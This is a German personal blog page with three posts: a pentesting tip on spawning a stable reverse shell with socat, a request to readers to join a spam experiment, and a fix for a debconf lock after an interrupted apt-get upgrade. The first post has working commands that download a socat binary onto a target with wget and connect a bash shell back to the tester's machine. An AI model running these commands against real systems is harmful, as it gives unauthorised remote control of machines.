Mit socat eine Remote-Shell spawnen

Abgelegt unter Code, Sicherheit am 22.01.2018

Weil ich dummerweise gerade wieder Strg+C gedrückt habe und mir logischerweise die netcat Remote-Shell dadurch abgenippelt ist…

Entweder ist socat schon auf dem Pentest-Opfer installiert (was zu 0,00001% der Fall ist), oder einfach per wget das entsprechende Binary holen.

wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat

Wobei das /tmp-Verzeichnis nicht zwingend beschreibbar sein muß…
Ein chmod +x /tmp/socat dann aber auch nicht vergessen!
(sind noch ein paar ganz andere hilfreiche Binaries zu finden: https://github.com/andrew-d/static-binaries )

Auf dem eigenen Rechner (pentestrechner) dann

socat file:`tty`,raw,echo=0 tcp-listen:12345

Port 12345 ist durch einen beliebigen Port zu ersetzen, Hauptsache er ist von außen zu erreichen… ggf. Firewall/Router das Portforwading einrichten

Und mittels:
/tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:pentestrechner:12345
klappt es dann auch mit der Remote-Shell, die einem nicht einfach mit Ctrl+C wegstirbt 😛


Ein kleines Spam-Experiment

Abgelegt unter blacklists am 18.12.2017

Mal sehen, ob das den gewünschten Effekt bringt…
http://www.lonesomewalker.com/spam-gegen-spam/

Bitte helft mir damit: wenn Ihr ein eigenes Blog oder Webseite habt, legt ebenfalls so eine Seite an!
Und nennt sie Anders, damit die Spammer nicht einen Filter in Ihre Bots einbauen können, der diese URL ausfiltert.

Ein Mirror dieser einzelnen Seite ist hiermit offiziell erlaubt 😀


Bei apt-get upgrade unterbrochen, .dat is locked by another process

Abgelegt unter Allgemein, Debian am 29.11.2017

Leider ist man als Telekom-Kunde ja viel Schmerzen gewohnt, und so kommt es auch öfters vor, daß einem die SSH-Sitzung wegstirbt.

Wenn dann nach einem erneuten Login mit apt-get upgrade nochmal versucht wird, den Aktualisierungsprozeß abzuschließen, erhält man oft:
debconf: DbDriver "passwords" warning: /var/cache/debconf/passwords.dat is locked by another process: Die Ressource ist zur Zeit nicht verfügbar
debconf: DbDriver "templatedb": /var/cache/debconf/templates.dat is locked by another process: Die Ressource ist zur Zeit nicht verfügbar

Ja, viele schreiben dann, man soll einfach dpkg –configure -a machen, und gut ist.
Oder erneut apt-get update && apt-get upgrade.

Ja, was aber tun, wenn das nichts wird?

Die Fehlermeldung ist ja eigentlich auch eindeutig: es gibt noch einen Prozeß, der die Datei gelockt hat.
Daher getrost die ganzen Pseudo-Profis ignorieren, und mit:
ps faxuww
erhält man schön strukturiert aufgelistet, was so alles an Prozessen läuft.
Da sucht man sich dann die letzte SSH-Sitzung, die zwar weg ist aber leider noch immer läuft.
Vorne dran steht die Prozess-ID, welche wir dann mit kill xxxx abschiessen.
Das {xxxx} bitte durch die eigene ID ersetzen.
Wichtig ist auch, den richtigen Prozess zu killen, d.h. nicht die einzelnen Prozesse des Updates, sondern den Mutterprozess.

Und schon klappts auch mit apt-get upgrade wieder 😉



blog powered by wordpress
Design by Office and IT - Business Solutions
Optimiert durch suchmaschinen-freundlich